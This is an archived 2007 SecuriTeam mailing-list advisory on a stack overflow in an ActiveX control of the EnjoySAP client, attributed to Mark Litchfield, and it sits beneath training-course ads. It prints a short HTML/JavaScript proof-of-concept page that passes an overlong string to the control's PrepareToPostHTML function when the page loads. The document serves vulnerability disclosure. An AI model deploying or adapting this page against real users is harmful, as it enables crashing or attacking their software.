Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]

[NT] EnjoySAP Stack Overflow

Subject: [NT] EnjoySAP Stack Overflow
Date: 9 Jul 2007 15:53:59 +0200
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  EnjoySAP Stack Overflow
------------------------------------------------------------------------


SUMMARY

 <ftp://ftp.sap.com/pub/sapgui/win/> EnjoySAP, also know as "Enjoy is the 
most popular SAP GUI used today". When installing EnjoySAP, in 
appreciation of its vast size for being a client (around 500MB), there are 
an astounding 1102 ActiveX controls installed.

A relatively brief examination of these controls, found a large number of 
instances that would terminate EnjoySAP process, there were a number that 
could create files on the file system (there unfortunately exists no 
ability to inject content into these created files) and a number of buffer 
overruns.

DETAILS

Technical Details:
Control - kweditcontrol.kwedit.1 (Marked Safe For Scripting)
Function - PrepareToPostHTML
DLL Path - C:\Program Files\SAP\FrontEnd\SapGui\kwedit.dll

Proof of Concept:
<HTML>
<HEAD>
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<SCRIPT type=text/javascript>
 
function init()
{
var foo = "";
 
for(var icount = 0; icount < 1060; icount++)
{
 foo = foo + "x";
}
var ngssoftware;
ngssoftware = new ActiveXObject("kweditcontrol.kwedit.1");
 
ngssoftware["PrepareToPostHTML"](foo);
}
//-->
</SCRIPT>
 
</HEAD>
<BODY bgColor=#ffffff onload=init()>
</BODY></HTML>


ADDITIONAL INFORMATION

The information has been provided by  <mailto:mark@ngssoftware.com> Mark 
Litchfield.



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages. 




<Prev in Thread] Current Thread [Next in Thread>
  • [NT] EnjoySAP Stack Overflow, SecuriTeam <=